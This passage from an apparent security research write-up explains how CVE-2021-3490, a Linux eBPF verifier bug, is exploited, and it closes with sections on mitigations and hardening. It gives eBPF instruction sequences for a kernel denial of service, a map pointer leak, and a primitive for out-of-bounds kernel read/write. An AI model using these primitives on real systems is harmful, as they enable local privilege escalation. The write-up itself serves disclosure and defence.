 * the program and through another bug we would manage to jump     
 * there, then we'd execute beyond program memory otherwise.   
 * Returning exception code also wouldn't work since we can have   
 * subprogs where the dead code could be located.
 */
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
    struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
    struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
    struct bpf_insn *insn = env->prog->insnsi;
    const int insn_cnt = env->prog->len;
    int i;
    
    for (i = 0; i < insn_cnt; i++) {
            if (aux_data[i].seen)
                   continue;
            memcpy(insn + i, &trap, sizeof(trap));
    }
}

Above, the function sanitize_dead_code is where this patching occurs. Interestingly, it patches all the dead instructions with a jmp -1 instruction. This means that once execution reaches the dead code path, it jumps back one instruction, executes the conditional statement, hits the jump again, and so on, in a never ending loop.

This leads to the kernel thread looping forever. You can run a few instances of the exploit, lock up all available kernel threads, and cause a DoS.

Map Pointer Leak

My second instinct was to use the register with invalid boundaries to widen the “safe” range for pointer arithmetic.

As previously mentioned, the verifier keeps track of which registers contain pointers and which contain scalars. While I was looking at the code I came across an interesting snippet:

/* Handles arithmetic on a pointer and a scalar: computes new      
 * min/max and var_off.
 * Caller should also handle BPF_MOV case separately.
 * If we return -EACCES, caller may want to try again treating     
 * pointer as a scalar.  So we only emit a diagnostic if           
 * !env->allow_ptr_leaks.
 */
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
                                   struct bpf_insn *insn,
                                   const struct bpf_reg_state *ptr_reg,
                                   const struct bpf_reg_state *off_reg)
{
...
    bool known = tnum_is_const(off_reg->var_off);
    s64 smin_val = off_reg->smin_value, smax_val = off_reg->smax_value,
        smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
    u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
        umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
...
    if ((known && (smin_val != smax_val || umin_val != umax_val)) ||
        smin_val > smax_val || umin_val > umax_val) {
            /* Taint dst register if offset had invalid bounds derived
             * from e.g. dead branches.
             */
            __mark_reg_unknown(env, dst_reg);
            return 0;
    }
...
}

The function adjust_ptr_min_max_vals shown above is called for arithmetic instructions involving a pointer. The register off_reg represents the offset scalar register being added to a pointer register. Notice that if the offset register has bounds such that umin_value > umax_value , the function __mark_reg_unknown is called on the destination register. This function marks the register as containing an unknown scalar value.

This means that if we have a register EXPLOIT_REG with bounds umin_value > umax_value and add it to a destination pointer register, the pointer register will be changed to a scalar. So, the verifier will no longer think that the register contains a pointer! This is notable because the verifier will now allow us to leak its value to user space by storing it in an eBPF map.

First, we need to extend the invalid 32 bit bounds u32_min_value, u32_max_value to their 64 bit counterparts umin_value, umax_value .

// Zero extend the lower 32 bits of EXPLOIT_REG
BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG)

Next, perform any arithmetic operation between a map pointer stored in OOB_MAP_REG and EXPLOIT_REG . Then, store the result into the map pointed to by STORE_MAP_REG , which is another eBPF map whose contents can be read from user space.

BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG)
BPF_STX_MEM(BPF_DW, STORE_MAP_REG, OOB_MAP_REG, 0)

We have now leaked the kernel address of an eBPF map, which we will use later on in the exploit!

Note: this can also be done once we have established kernel read/write primitives. This is done by accessing the private_data structure of the file from the fd table, which we can get once we have the address of the thread’s task_struct . However, this requires many more dependencies on hardcoded kernel offsets. I like to avoid this whenever possible, as it makes exploits more annoying to maintain. I thought this shortcut was a nice improvement.

Verifier Range Tracking Primitive

Now, we create a primitive that will allow us to make out of bound read/writes. This will give us arbitrary read/write in the kernel. The idea is that we can create a register that the verifier believes has a value of 0, but really has a value of 1 during runtime.

First, trigger the bug, where we have EXPLOIT_REG with invalid 32 bit bounds u32_max_value = 0 < u32_min_value = 1 .

Next, add 1 to EXPLOIT_REG .

BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1)

In the case of immediate instructions, the immediate value is simply added to all the bounds, provided adding it will not cause an overflow. Thus, after adding 1 to EXPLOIT_REG , we have u32_max_value = 1 and u32_min_value = 2 , with var_off = {mask = 0x100000000; value = 0x1} .

Now we need a register with an initially unknown value. Let’s call this register UNKNOWN_VALUE_REG . We create the register the same way as before, by loading a value from an eBPF map. The real runtime value of the register will be 0. Then, we start to manipulate the bounds of the register by adding a conditional jmp statement:

BPF_JMP32_IMM(BPF_JLE, UNKNOWN_VALUE_REG, 1, 1)
BPF_EXIT_INSN()

The above conditional jmp32 instruction will skip the exit instruction if the value of the lower 32 bits of the register is less than or equal to 1. Because the actual value of the register will be 0, the conditional statement will evaluate to TRUE and the exit instruction will be skipped. However, because the verifier does not know what the value will be, the 32 bit bounds of the register in the TRUE branch will be set to: u32_min_value = 0 and u32_max_value = 1. Remember, the jmp was conditional on the lower 32 bits, so the upper 32 bits are still unknown. The lowest bit is also unknown, since it can be either 0 or 1. So this register has var_off = {mask = 0xFFFFFFFF00000001; value = 0x0} .

Now, let’s look at how these bounds are updated when two registers are added together:

BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKNOWN_VALUE_REG)

First, in adjust_scalar_min_max_vals :

static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state 
                                             *dst_reg,
                                      struct bpf_reg_state src_reg)
{
  ...
    switch (opcode) {
        case BPF_ADD:
            scalar32_min_max_add(dst_reg, &src_reg);
            scalar_min_max_add(dst_reg, &src_reg);
            dst_reg->var_off = tnum_add(dst_reg->var_off, 
                                        src_reg.var_off);
            break;

...
}

The scalar add functions are called. Let’s look at the 32 bit case :

static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
                                 struct bpf_reg_state *src_reg)
{
    s32 smin_val = src_reg->s32_min_value;
    s32 smax_val = src_reg->s32_max_value;
    u32 umin_val = src_reg->u32_min_value;
    u32 umax_val = src_reg->u32_max_value;

...
    if (dst_reg->u32_min_value + umin_val < umin_val ||
        dst_reg->u32_max_value + umax_val < umax_val) {
            dst_reg->u32_min_value = 0;
            dst_reg->u32_max_value = U32_MAX;
        } else {
            dst_reg->u32_min_value += umin_val;
            dst_reg->u32_max_value += umax_val;
        }
}

If the addition operation doesn’t overflow either of the bounds, the bounds of the destination and source register are simply added together. This will result in EXPLOIT_REG having new 32 bit bounds: u32_min_value = 2, u32_max_value = 2 !

Next, in the BPF_ADD case of the adjust_scalar_min_max_vals snippet above, tnum_add will be called and the result saved to var_off of the destination register. This function returns what is known about the result of adding two tnum s together.

Our registers are EXPLOIT_REG : var_off = {mask = 0x100000000; value = 0x1} and UNKNOWN_VALUE_REG : var_off = {mask = 0xFFFFFFFF00000001; value = 0x0} . Because the upper 32 bits of UNKNOWN_VALUE_REG are unknown, the upper 32 bits of the result will also be unknown. The same goes for the lowest bit - it could be either 0 or 1. Since the lowest bit of EXPLOIT_REG is known to be 1, the result of adding the two bits could be either 1 or 2. This means that the second lowest bit is also unknown. The rest of the bits are known to be 0 in both the destination and source. This leaves EXPLOIT_REG with var_off = {mask = 0xFFFFFFFF00000003; value = 0x0} .

Recall that the verifier will now call three more functions that will affect the bounds of the destination register: __update_reg_bounds , __reg_deduce_bounds , and __reg_bound_offset .

In __update_reg32_bounds , where var32_off.value is var_off for the lower 32 bits of destination register EXPLOIT_REG :

reg->u32_min_value = max_t(u32, reg->u32_min_value,
                          (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
                         (u32)(var32_off.value | var32_off.mask));

Luckily, the bounds remain unchanged. Since 2 > 0 , the min bound remains the same. For the max bound, we are not comparing against var32_off.value = 0 , but var32_off.value | var32_off.mask = 3 . So, since 2 < 3 , the max bound also remains the same. Similar logic applies to the signed bounds.

Since the signed and the unsigned 32 bit bounds are all equal, they are not modified by __reg32_deduce_bounds .

Last, in __reg_bound_offset , we have:

struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
                                     tnum_range(reg->u32_min_value,
                                     reg->u32_max_value));

Where var32_off will be set equal to the lower 32 bit component of var_off for our destination register, EXPLOIT_REG . Recall that since u32_min_value = u32_max_value , tnum_range will return a tnum with a known constant value of 2, since the range only includes one integer value. Since the current var_off has a lower 32 bit mask = 0x3 and value = 0x0 , tnum_intersect returns a tnum whose lower 32 bits are fully known and equal to 2!

After all that, we have EXPLOIT_REG with bounds: {u,s}32_min_value = {u,s}32_max_value = 2, var_off = {mask = 0xFFFFFFFF00000000; value = 0x2} . That is to say, a register whose lowest 32 bits are known and equal to 2. During runtime though, the register is equal to 1!

All that’s left to do is zero extend the lower 32 bits of the register and do a simple AND operation:

BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG)
BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1)

The verifier will now believe EXPLOIT_REG = 0 because 2 & 1 = 0 , but it will be equal to 1. We can now use this register to do OOB read/writes on eBPF map pointers.
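
To turn this into an out-of-bounds access, we can reuse the scaling trick from Manfred Paul's writeup: multiply the 0-or-1 register by the desired byte offset and add it to a map value pointer. In the sketch below, MAP_PTR_REG and offset are placeholders, not names from the PoC:

// The verifier believes EXPLOIT_REG == 0, so it thinks the pointer below is
// left unchanged and stays in bounds. At runtime EXPLOIT_REG == 1, so the
// pointer actually moves by `offset` bytes, outside the map.
BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, offset)
BPF_ALU64_REG(BPF_ADD, MAP_PTR_REG, EXPLOIT_REG)
// OOB read: load 8 bytes from outside the map into R0.
// (An OOB write would use BPF_STX_MEM instead.)
BPF_LDX_MEM(BPF_DW, BPF_REG_0, MAP_PTR_REG, 0)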

ALU Sanitation

The strategy to bypass ALU Sanitation is excellently described in this blog by Manfred Paul. Here he details the LPE exploitation strategy he used in Pwn2Own 2020.

Interestingly, this bypass was not needed at the time of the 2020 competition. When testing my exploit, I found that it was failing on some newer (but still vulnerable) Ubuntu kernels. The reason was that I was not bypassing ALU Sanitation. During my initial research period I looked at many different public eBPF verifier exploits. Strangely, I didn’t see an ALU Sanitation bypass in any of them!

After some investigation I discovered the reason. There was an integer underflow bug in the verifier's calculation of alu_limit . It was present until March 2021, and fixed in this commit [17].

The bug is triggered when alu_limit = 0 . An example case is doing a subtraction operation with a pointer at the start of a map.

The sanitation instruction that was patched in:

*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);

Subtracting 1 from 0 results in aux->alu_limit = 0xFFFFFFFF .

The strategy for eBPF exploits depends on modifying the bpf_map structure found in the memory chunk before the map’s memory. This is done by subtracting from a map pointer.

ALU Sanitation was rendered completely useless by this bug against exploits of this type, and it went unnoticed even though many PoCs were publicly available. Of course, ALU Sanitation can be easily bypassed regardless. The new implementation of ALU Sanitation is much more effective against these attacks, which I will go over in the Mitigations section.

Finishing Up the LPE

We have established the primitive, a register EXPLOIT_REG which the verifier believes to be 0 but is actually equal to 1 at runtime. The next steps are beautifully outlined in Manfred Paul’s blog post. You can check out the released PoC to see the implementation.

https://youtu.be/EtQieYKtTY8

Mitigations

Unprivileged eBPF

As mentioned in the introduction, running eBPF programs can be disallowed for unprivileged users by setting the sysctl knob kernel.unprivileged_bpf_disabled . In May 2021, a new kconfig knob, BPF_UNPRIV_DEFAULT_OFF , was introduced that sets the sysctl knob by default [7].
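
A quick way to check whether a target system has this mitigation enabled is to read the sysctl from procfs (sketch; a non-zero value means unprivileged bpf() is disabled):

#include <stdio.h>

int main(void)
{
    int val = -1;
    FILE *f = fopen("/proc/sys/kernel/unprivileged_bpf_disabled", "r");

    if (f) {
        if (fscanf(f, "%d", &val) != 1)
            val = -1;
        fclose(f);
    }
    /* 0 means unprivileged users may still load eBPF programs. */
    printf("kernel.unprivileged_bpf_disabled = %d\n", val);
    return 0;
}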

Enabling these configurations will protect against attacks by disallowing unprivileged users from [ab]using eBPF. However, this doesn’t mitigate the problem completely. A privileged user can still use the arbitrary kernel write in this exploit to bypass or disable kernel security modules like SELinux.

ALU Sanitation

As of April 2021, the implementation of ALU Sanitation has changed [15]. The new implementation helps mitigate attacks like the one demonstrated in this blog.

First, the way alu_limit is calculated has changed. Now, instead of using the position of the pointer register to compute it, the offset register is used instead. For example, suppose we have some register with unsigned bounds umax_value = 1, umin_value = 0. Then, the computed alu_limit = 1. This means that if the register is outside of those bounds during runtime, pointer arithmetic does not occur using that register.

Additionally, ALU sanitation now patches pointer operation instructions if the scalar register is known to be constant.

bool off_is_imm = tnum_is_const(off_reg->var_off);
alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;
isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {
        *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
} else {
        // Patch in the alu_limit check instructions
        ...
}

The above patch shows that the offset register is only checked against its alu_limit if it is not known to be constant. If it is constant, the operation is patched with an immediate instruction using its constant value.

Here’s an example. Suppose we have the following instruction:

BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)

Here, BPF_REG_2 contains a pointer to a map, and EXPLOIT_REG is a register the verifier believes has a value of 0, but whose runtime value is 1. ALU Sanitation will apply a patch such that the effective instruction is:

BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)

The intention is to mitigate against speculative execution side-channel vulnerabilities[16], but it also serves to thwart attack methods such as the one presented in this blog.

Sadly, this marks the end of an era for this elegant exploit primitive against the eBPF verifier. While this will make exploiting vulnerabilities like CVE-2021-3490 harder, I do not think this will be the end of exploitation with eBPF. I’ll discuss this further in the next section.

Future Considerations

Since the introduction of eBPF, there have been a number of privilege escalation attacks that leverage the technology. In addition to exploiting vulnerabilities in eBPF itself, it also represents a powerful primitive for exploiting other kernel vulnerabilities. While eBPF can be a great tool for developers, there’s still more work to be done to harden it further.

Despite the new mitigations discussed in the ALU Sanitation section, exploits like the one demonstrated in the DoS exploitation section will still work. Patching dead code branches with exit instructions instead of backwards jumps would prevent these types of attacks.

An LPE exploit writeup by Qualys published in July 2021 uses a memory corruption vulnerability to overwrite an eBPF program buffer, which contains the eBPF bytecode for a loaded program. Instead of fooling the verifier, the program is valid and passes verification. The buffer is overwritten after verification but before JIT compilation to achieve OOB read/write capabilities [8]. As this exploit demonstrates, the window between verification and JIT compilation is not small, and a race against it can be won to land a targeted write. The eBPF program buffer should be marked read-only before verification and stay read-only until JIT compilation, so that it cannot be modified anywhere in between. This would prevent eBPF from being used as a powerful primitive when exploiting kernel memory corruption vulnerabilities. This was first suggested by Brad Spengler in 2016 [9].

References

Acknowledgements

Manfred Paul, for the original vulnerability discovery, and the excellent writeup on exploiting CVE-2020-8835, an eBPF verifier vulnerability.

Simon Scannell, for a great eBPF fuzzing and exploitation writeup. As well as an excellent PoC exploiting CVE-2020-27194, another eBPF verifier vulnerability. I used this PoC to learn about eBPF bytecode and exploitation.

Andréa, for her excellent work helping with graphics and the publishing of this blog post.

InsanityBit and Grapl, for supporting this research.

